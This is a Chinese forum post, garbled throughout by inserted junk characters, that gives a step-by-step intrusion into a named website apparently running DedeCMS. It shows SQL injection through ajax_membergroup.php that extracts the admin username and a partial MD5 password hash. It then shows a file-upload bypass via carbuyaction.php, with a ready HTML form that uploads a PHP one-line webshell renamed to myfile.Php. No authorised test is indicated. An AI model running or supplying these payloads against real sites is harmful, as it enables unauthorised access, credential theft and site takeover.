①注入漏洞。
$ G& v; r4 a: l* C这站 http://www.political-security.com/
4 x' a2 z/ z# a4 L4 M首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,! G; ^0 C5 f5 U
www.political-security.com/data/mysql_error_trace.inc 爆后台
H" a! T; j1 M8 T然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。 p" O# ?( R2 d: A
然后写上语句
/ b" m3 {9 v/ l- F3 B/ E) X查看管理员帐号
) Q! s6 |, \2 i( ghttp://www.political-security.co ... &membergroup=@`) G( O! D" u1 X
; l: d3 w2 l" ~, V+ X& U
admin ; T" i! z' T* w/ c
8 j8 j$ m4 b, `1 ]2 a0 w. D6 l查看管理员密码
" i5 K: V7 H- ~+ o! z5 ] http://www.political-security.co ... &membergroup=@`1 t+ b4 F2 H! i+ `( ~
! O7 g6 K% O+ J, n0 p
8d29b1ef9f8c5a5af429- q; \; j/ Z/ k# t4 a+ d$ n( g
L* b$ j; a& i' ]) y查看管理员密码3 f: o' }. V9 W! ]
7 {, P0 O) T+ j2 D
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5! U! G0 Y' {" r, \+ }! Q1 d
8 q$ I5 Y# `) l+ y0 {8d29 x4 d! Y& A. f. L" E w4 _
9b1ef9f8c5a5af427 L* W3 o) [5 p+ z5 M# W5 Q
9% g: f4 Z5 y9 ]8 m, A. [1 H$ l3 R
/ c; @; \$ G I ncmd5没解出来 只好测试第二个方法3 |2 M" F6 v# |6 Q7 m( B
) i" }* s# A: }; j
- P0 \5 c8 J$ m4 A7 |4 d②上传漏洞:
& V. L" t7 I/ S: X3 A- V1 ?- u& a, k1 s; `6 E- q$ G
只要登陆会员中心,然后访问页面链接
; ^4 j# J0 I. X“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
1 V7 v! r" {; D, l1 S* U' y3 l% f' Y+ G, F/ \# f- i% C8 |
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
( T% }* |% a5 v9 E3 a/ k p) ?% a) g& C _7 Q
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm6 i7 I) D2 X* }/ O7 A: G/ E
' W; M4 H# E. Q. n% f- C. p2 m<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>6 w& [: d. ?0 `- ?4 I. A- o
或者7 W/ A# d6 _8 f" o( l
即可上传成功 |